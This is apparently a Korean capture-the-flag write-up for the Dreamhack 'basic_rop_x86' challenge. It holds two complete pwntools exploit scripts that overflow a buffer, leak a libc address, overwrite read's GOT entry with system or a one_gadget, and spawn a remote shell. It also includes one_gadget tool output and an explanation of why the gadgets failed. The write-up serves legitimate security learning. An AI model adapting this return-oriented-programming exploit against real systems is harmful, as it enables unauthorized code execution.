문제

참고

from pwn import *
context.log_level = 'debug'
p = remote('host1.dreamhack.games', 21445)
libc = ELF("./libc.so.6")
e = ELF("./basic_rop_x86")

read_got = e.got['read']
write_plt = e.plt['write']
read_plt = e.plt['read']
read_offset = libc.symbols['read']
pppr = 0x8048689
bss = e.bss()
system_offset = libc.symbols['system']

payload = ''
payload += 'a'* 0x48
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(8)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += 'aaaa'
payload += p32(bss)

p.sendline(payload)
dummy = p.recv(0x40)
read_addr = u32(p.recv(4))
print hex(read_addr)
libc_base = read_addr - read_offset
system = libc_base + system_offset
#print hex(one_gadget)
p.sendline('/bin/sh')
p.sendline(p32(system))

p.interactive()

bss 영역에 /bin/sh를 넣은 후 readgot를 변조시키는 풀이입니다.

one_gadget(해결?)

from pwn import *
context.log_level = 'debug'
p = remote('host1.dreamhack.games', 21445)
libc = ELF("./libc.so.6")
e = ELF("./basic_rop_x86")

read_got = e.got['read']
write_plt = e.plt['write']
read_plt = e.plt['read']
read_offset = libc.symbols['read']
pppr = 0x8048689
one_gadget_offset = 0x5f066
payload = ''
payload += 'a'* 0x48
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)

payload += p32(read_plt)


p.sendline(payload)
dummy = p.recv(0x40)
read_addr = u32(p.recv(4))
#print hex(read_addr)
libc_base = read_addr - read_offset
one_gadget = libc_base + one_gadget_offset
#print hex(one_gadget)

p.sendline(p32(one_gadget))

p.interactive()

$ one_gadget ./libc.so.6 
0x3a80c execve("/bin/sh", esp+0x28, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x28] == NULL

0x3a80e execve("/bin/sh", esp+0x2c, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x2c] == NULL

0x3a812 execve("/bin/sh", esp+0x30, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x30] == NULL

0x3a819 execve("/bin/sh", esp+0x34, environ)
constraints:
  esi is the GOT address of libc
  [esp+0x34] == NULL

0x5f065 execl("/bin/sh", eax)
constraints:
  esi is the GOT address of libc
  eax == NULL

0x5f066 execl("/bin/sh", [esp])
constraints:
  esi is the GOT address of libc
  [esp] == NULL

one_gadget을 이용해셔 풀려고 했는데 문제에서 준 libc파일에서 나오는 one_gadget모두를 써보았으나 eof에러가 납니다.

원가젯 사용 조건을 고려하지 않은 실수입니다. 원가젯은 밑에 constraints 조건 하에서 동작하므로 이를 확인해야 합니다. 원가젯을 이용하면 /bin/sh문자열을 따로 어디에 넣을지 고민하지 않아도 되지만 사용 조건이 안맞을 수 있기 때문에(실행시 레지스터 값이 바뀔 수 있기 때문에) 맹신하면 안됩니다.